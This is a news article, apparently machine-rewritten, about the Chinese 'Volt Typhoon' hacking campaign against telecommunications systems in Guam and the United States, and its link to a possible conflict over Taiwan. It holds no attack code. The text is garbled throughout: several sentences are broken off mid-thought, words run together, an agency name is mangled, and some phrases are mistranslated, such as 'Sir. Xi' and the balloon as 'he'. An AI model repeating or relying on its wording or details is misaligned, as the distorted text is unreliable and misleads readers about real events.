Chinese malware attacks systems in Guam. Is Taiwan the right destination? (2023)

Around the time the F.B.I. While examining hardware recovered from a Chinese spy balloon shot down off the coast of South Carolina in February, US intelligence agencies and Microsoft discovered a more disturbing intruder: mysterious computer code that appeared in telecommunications systems in Guam and elsewhere in the United States.

The code, which Microsoft says was installed by a Chinese government hacking group, has caused alarm because Guam, with its Pacific ports and large US air base, would be the centerpiece of any US military response to an invasion or blockade of Taiwan. The operation was conducted in great secrecy, sometimes streaming through home routers and other popular Internet-connected consumer devices to make the intrusion more difficult to trace.

This code is called a "network shell", in this case a malicious script that allows remote access to the server. Home routers are particularly vulnerable, especially older models that don't have updated software and security.

In contrast tothe balloon that fascinated Americansbecause he pirouetted over sensitive nuclear facilities, the computer code could not be shot down on live television. Instead Microsoft Wednesdaypublished code detailswhich would enable business users, manufacturers and others to detect and remove them. In a coordinated communique, the National Security Agency - along with other national agencies and counterparts in Australia, the UK, New Zealand and Canada -published a 24-page guidewhich referred to Microsoft's findings and offered broader warnings about a "newly discovered cluster of activity" from China.

Microsoft has dubbed the hacking group "Volt Typhoon" and said it is part of a state-backed Chinese effort targeting not only critical infrastructure such as communications, electricity and gas facilities, but also marine and transport operations. For now, the break-ins seemed like a spy campaign. But the Chinese could use code designed to penetrate firewalls to allow destructive attacks if they chose.

So far, Microsoft says there is no evidence that the Chinese group used access for any offensive attacks. Unlike Russian groups, Chinese intelligence and military hackers tend to prioritize espionage.

In interviews, administration officials said they believed the code was part of a massive Chinese intelligence effort spanning cyberspace, outer space and, as the Americans discovered after the balloon incident, the lower atmosphere.

The Biden administration declined to discuss what the F.B.I. found while examining equipment recovered from the balloon. But the ship — better described as an enormous airship — apparently contained specialized radar and communications interception devices that the F.B.I. since the balloon was shot down.

It is not clear whether the government's silence on the balloon discovery is motivated by a desire to prevent the Chinese government from learning what the United States has learned or to overcome a diplomatic rift that followed the incursion.

President Biden spoke at a news conference in Hiroshima, Japan on Sunday about how the balloon incident had crippled an already frosty exchange between Washington and Beijing.

"And then this stupid balloon carrying two truckloads' worth of spy equipment flew over the United States," he told reporters, "and it was shot down and everything changed in terms of conversation."

He predicted that the relationship "will soon begin to melt away."

China has never admitted intruding into American networks, even in the biggest example of all: the theft of some 22 million Americans' security credentials — including six million sets of fingerprints — from the Obama administration's Office of Personnel Management. This data exfiltration lasted the better part of a year and resulted in an agreement between President Barack Obama and President Xi Jinping that resulted in a brief dip in malicious Chinese cyber activity.

On Wednesday, China sent a warning to its companies to beware of US hacking attacks. And there was plenty of that, too: in documents released by Edward Snowden, former N.S.A. contractor, there was evidence of US attempts to hack into the systems and military and leadership targets of Huawei, the Chinese telecommunications giant.

Telecommunications networks are key targets for hackers, and the Guam system is particularly important to China because military communications are often connected to commercial networks.

Tom Burt, supervisor of Microsoft's threat intelligence unit, said in an interview that the company's analysts -- many of them veterans of the National Security Agency and other intelligence agencies -- found the code "while investigating intrusion activity affecting a U.S. port." When they traced the breach, they found other networks that had been compromised, "including some in the telecommunications sector in Guam."

Anne Neuberger, deputy national security adviser for cyber and emerging technologies, said covert activities "such as the activity disclosed today are part of what drives our focus on the security of telecommunications networks and the urgent need to use trusted providers." whose equipment meets established cyber security standards.

Ms. Neuberger is leading the federal government's efforts to enforce new cybersecurity standards for critical infrastructure. Officials were surprised by the extent of gaps in such infrastructure when aRussian ransomware attack on Colonial Pipelinein 2021, it cut off the flow of gasoline, diesel, and jet fuel on the East Coast. In the wake of the attack, the Biden administration used the little-known powers of the Transportation Security Administration — which regulates pipelines — to force utilities to comply with a series of cybersecurity mandates.

Now, Ms. Neuberger is leading what she called "a relentless focus on improving cybersecurity in our pipelines, rail systems, water systems and other critical services," including mandating cybersecurity practices for those sectors and working more closely with companies with "unique visibility." risks for such infrastructure.

These companies include Microsoft, Google, Amazon and many telecommunications companies that can monitor activity on national networks. Intelligence agencies, including the NSA, are prohibited by law from operating in the United States. But the N.S.A. can issue warnings, as it did Wednesday, along with the FBI. and the Department of Homeland Security's Cyber ​​Infrastructure and Security Administration.

The agency's report is part of a relatively recent move by the U.S. government to quickly release such data in hopes of busting operations like the one orchestrated by the Chinese government. In years past, the United States has tended to hide such information—sometimes by classifying it—and release it only to a select few companies or organizations. But it almost always ensured that hackers could be well ahead of the government.

In this case, the focus on Guam has particularly attracted the attention of officials who are assessing China's ability – and its willingness – to attack or subdue Taiwan. Sir. Xi ordered the People's Liberation Army to be able to occupy the island by 2027. The director, William J. Burns, pointed out to Congress that the order "does not mean that he has decided to invade."

In the dozens of U.S. tabletop exercises conducted in recent years to determine what such an attack might look like, one of China's first predicted moves would be to disrupt U.S. communications and slow the U.S.'s ability to respond. The exercises thus include attacks on satellite and ground-based communications, especially around US installations where military resources would be mobilized.

None is bigger than Guam, where Andersen Air Force Base would be the launch point for many Air Force missions to help defend the island, and the naval port is critical for U.S. submarines.